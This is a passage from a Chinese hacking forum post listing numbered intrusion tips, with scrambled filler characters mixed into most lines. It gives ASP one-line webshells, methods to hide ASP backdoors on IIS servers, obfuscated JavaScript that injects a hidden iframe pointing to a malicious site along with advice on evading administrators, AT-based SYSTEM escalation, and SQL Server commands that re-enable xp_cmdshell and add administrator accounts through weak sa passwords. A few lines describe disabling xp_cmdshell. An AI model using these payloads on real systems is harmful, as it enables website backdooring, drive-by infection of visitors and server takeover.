, h& B; Y# Y  m( |% pc).%><%execute request("go")%><%; ]5 H* v% n$ l( q! }: W
d).<script language=VBScript runat=server>execute request("sb")</Script>- }2 x' P/ y- }9 g- N% A- p% a
e).<%25Execute(request("l"))%25>- e# d0 Z  C: r' v& ]
f).<%if request("cmd")<>"" then execute request("pass")%>6 {) _: j, k; r% F' n

7 Y9 u" a) g# D/ n- J52、at "12:17" /interactive cmd) H  q6 G1 {# n" Z1 h9 N# r
执行后可以用AT命令查看新加的任务
- ]/ B9 C" m/ l用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
7 \0 T: i$ c& D2 E# i: g+ l" w/ g7 d! b# }- B
53、隐藏ASP后门的两种方法
! h2 T% \9 t9 f, G1、建立非标准目录:mkdir images..\
, y& c; f; J& e+ o6 M1 b2 L% y1 |% ?* k拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 _% X8 x; K+ [9 g5 O- r8 _通过web访问ASP木马:http://ip/images../news.asp?action=login" r5 A0 D% x  ~9 X
如何删除非标准目录:rmdir images..\ /s8 x2 A% D( f6 s3 U! O
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
6 H9 b: g4 n2 y" xmkdir programme.asp
$ f+ o" c& x# C3 n* y新建1.txt文件内容:<!--#include file=”12.jpg”-->1 W+ X; v  e9 H" V" a% E  W  ^
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件3 V8 l4 N6 l- k
attrib +H +S programme.asp
( a7 V  R0 g5 q) d3 M0 O通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! @" v" \/ W; H4 B( W( j* ?* K
- H9 w- E! s9 k+ Z5 U
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" F  {: \8 k. ?/ c# @
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
: D# s1 _. G; H. I2 Z- V! J% Y2 k1 l1 d, f
55、JS隐蔽挂马
! i" Q! Q6 b; V: F. ]) l  Y1.+ w4 {% t& `2 z1 c. @8 ^& j* ^
var tr4c3="<iframe src=ht";
; G- l# I. `% c6 H) C+ Xtr4c3 = tr4c3+"tp:/";  v. h2 N% \/ }% E9 k
tr4c3 = tr4c3+"/ww";. G. T9 I/ n! q" U. \" {
tr4c3 = tr4c3+"w.tr4";* d' G9 i0 G) o: K- N
tr4c3 = tr4c3+"c3.com/inc/m";
9 Q$ ~" G& p& Z- M$ H" Ntr4c3 = tr4c3+"m.htm style="display:none"></i";
: X7 }! _- L. s0 z+ I/ _tr4c3 =tr4c3+"frame>'";5 c3 f) w0 ?4 a8 ~1 w) U
document.write(tr4c3);' W9 n* y9 X0 g& B- q$ ]6 l" |* _
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。3 r% i4 M+ L6 f: ?, y3 |; [

& h( K! {6 S, i( D( h; K0 T2.
% `& U2 C" J+ ^转换进制,然后用EVAL执行。如
, M" W5 n% Q& ]4 W8 |eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ r2 q& W6 t! s2 O6 Y不过这个有点显眼。
+ ]$ j1 m- n4 P5 V9 }; d1 e3.- V! |8 x' Q/ |9 h* _
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
/ I6 D, ^4 z# N! m& T" K最后一点,别忘了把文件的时间也修改下。* Z* ~4 z4 N* d* O$ B3 w

  j1 b% _6 N0 m- x56.3389终端入侵常用DOS命令
8 N% m- r6 U) N' l8 _taskkill taskkill /PID 1248 /t9 C. S7 R; X' U, k/ L9 m1 g4 B
4 d) A" x; q$ S5 p
tasklist 查进程$ I! S9 c8 G- \: X

, N6 K% n# p! B0 Qcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" Q( O* p* {# E7 u5 Y
iisreset /reboot
  H) f( J4 |5 n" H! Jtsshutdn /reboot /delay:1    重起服务器
; v2 M8 [- x3 W
3 ~& e& K" i8 `, g5 J3 Hlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,2 Y, {1 x& t0 _7 A& E1 i7 W* @% C
5 C- t) `' v) x
query user 查看当前终端用户在线情况
: B! k1 P) g0 C( x, W: A  X9 k( ]9 B; N/ A0 Q7 r$ U
要显示有关所有会话使用的进程的信息,请键入:query process *$ L* a: v# m9 l' a
/ C) h) W' n+ S. W/ g, w% Z5 b
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2% H* P0 r- O! u( Z9 u  S
# c" X7 T5 R) @/ |* }$ [
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2, o0 X( @4 L4 L1 Z- G0 h- d; e

3 @5 ]. {" Z9 T5 Q& b要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM023 O1 Z( U4 J6 ~) N- U

3 }% y4 d8 D" D& e1 h$ J$ }: `命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
+ ^) J6 R9 y# c" M2 o* e, K: |$ t# I
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统/ Z+ r# y9 m/ W$ Q% p
+ d- W+ M  m6 H# \
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
+ C9 r  K7 B  E* K/ {8 `4 [: I# b, w4 B  E, f. J; a( B
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机9 p9 Z8 u5 O5 \* S6 L* g( c3 z
7 h+ p$ F8 a5 r$ S- S
56、在地址栏或按Ctrl+O,输入:7 a/ w; G* [7 L* ~
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
' J' e+ B/ `' F+ s9 W. W
0 R6 A! J! b1 h0 l% O源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
0 @; o( I' P4 o- ]8 v. H" r# r/ A$ w, |$ n
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
2 E: X: r" c+ j- M, R用net localgroup administrators是可以看到管理组下,加了$的用户的。
$ ^/ v/ W$ E7 l) f) v/ I) V& w/ O! i' H, I1 X% n/ V) L. V0 h
58、 sa弱口令相关命令
6 g0 r4 w) G8 h* W
% _5 Y$ f9 W2 e" b8 u) f/ T一.更改sa口令方法:
8 U! z& u; R) X7 p" [5 O用sql综合利用工具连接后,执行命令:5 ?4 [8 ^5 G% H8 Z
exec sp_password NULL,'20001001','sa'( t* }  q; m; F" s3 E
(提示:慎用!)5 }- i& L% |7 t# [/ G0 D
6 [: k- k  I: k/ Y' t8 X8 ]/ M
二.简单修补sa弱口令.
! X0 @! ?0 S! D$ M# T8 C) G9 N2 j$ H+ P+ M
方法1:查询分离器连接后执行:
1 R& q$ j  L5 [! ~# W" Bif exists (select * from! @9 Z  ]7 _# X4 r8 m! I. {
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and0 P! k9 {7 i% E8 y: y
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) V! _; ^: ~' \% V  W2 W4 ]- j; l4 \1 Y- N, Y$ {
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'; |, ]2 C6 Q& ^  a  o% `

; i& q) M0 ?1 n1 s1 l( OGO( k7 q% E% G4 p# b0 N# J% g% d0 ~
, g3 X; {+ |: _
然后按F5键命令执行完毕
1 n: A7 A" Y3 {6 ?! r. Z, |1 q* i; I& o1 y- E4 r! a+ r
方法2:查询分离器连接后
. i+ q, G$ Y& F+ @" H6 n第一步执行:use master
! d3 w7 D" p! ]/ x0 }3 ~第二步执行:sp_dropextendedproc 'xp_cmdshell'
( j  _: r# Z  ?8 `: Q! V然后按F5键命令执行完毕$ T7 ?; x( U+ {0 Q; I
! d& O2 ?7 v: L

. x- f' W+ o0 o. F/ T: T9 c, Y/ I0 D三.常见情况恢复执行xp_cmdshell.
) g* p: }% o& s* B3 K
/ r1 U' M* ^* z. Q2 Y/ a/ u+ n9 E/ ^5 g( `
1 未能找到存储过程'master..xpcmdshell'.& b) J# A5 b: N7 Q
   恢复方法:查询分离器连接后,
, u% D. u- j* `4 u) I9 ~第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( G: H7 y8 W- H第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. I2 e2 F) e& Y: @6 l/ v
然后按F5键命令执行完毕
: o! E8 t. ~) G( z
/ z# {* `+ e+ b- p2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)6 C* _! o$ L/ H( @
恢复方法:查询分离器连接后,/ e1 m* D, t. m: `6 x. e
第一步执行:sp_dropextendedproc "xp_cmdshell"/ y$ B2 X9 y5 e" N/ y- |3 N
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 B" d3 s& z" r$ j* q- c
然后按F5键命令执行完毕
' S! L2 ^( E- F: j/ O
$ R6 j2 }6 T& u+ @! y3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)% t1 }/ J3 U' Y# ^
恢复方法:查询分离器连接后,
+ s% X' P1 N1 n% T, j2 k6 R第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' Y; P1 l6 {' d3 e$ B第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
  u" Y' Z7 {& M+ P" c7 Y然后按F5键命令执行完毕+ M; r: P) ]+ z, C, V" h( p
3 X5 t/ G9 m) y; a- J9 |
四.终极方法.
8 ~7 t4 R3 c9 U* U/ p5 j, Q) N如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:/ R9 q( w& O* H9 v# o
查询分离器连接后,& |! k0 x* k* C3 z# [: r
2000servser系统:
! S2 J' R% ?. B6 k( wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'+ }+ X+ z, `0 \0 H3 |# y+ B
; m; X" Y) j* l8 p, \/ W5 C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% y/ e# K, \5 A# ~/ k) y* h" j3 f: }0 c7 f% R; K0 }& `8 ~6 s
xp或2003server系统:7 E7 d, ~4 W9 @9 y; B
- b/ i9 @9 J2 V4 q  E8 ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
2 P+ B) g, q+ D9 e0 v5 y# K$ f) O
9 w6 g5 Z5 w; C) Z( ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- N" k2 _5 e/ G; w- r' a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表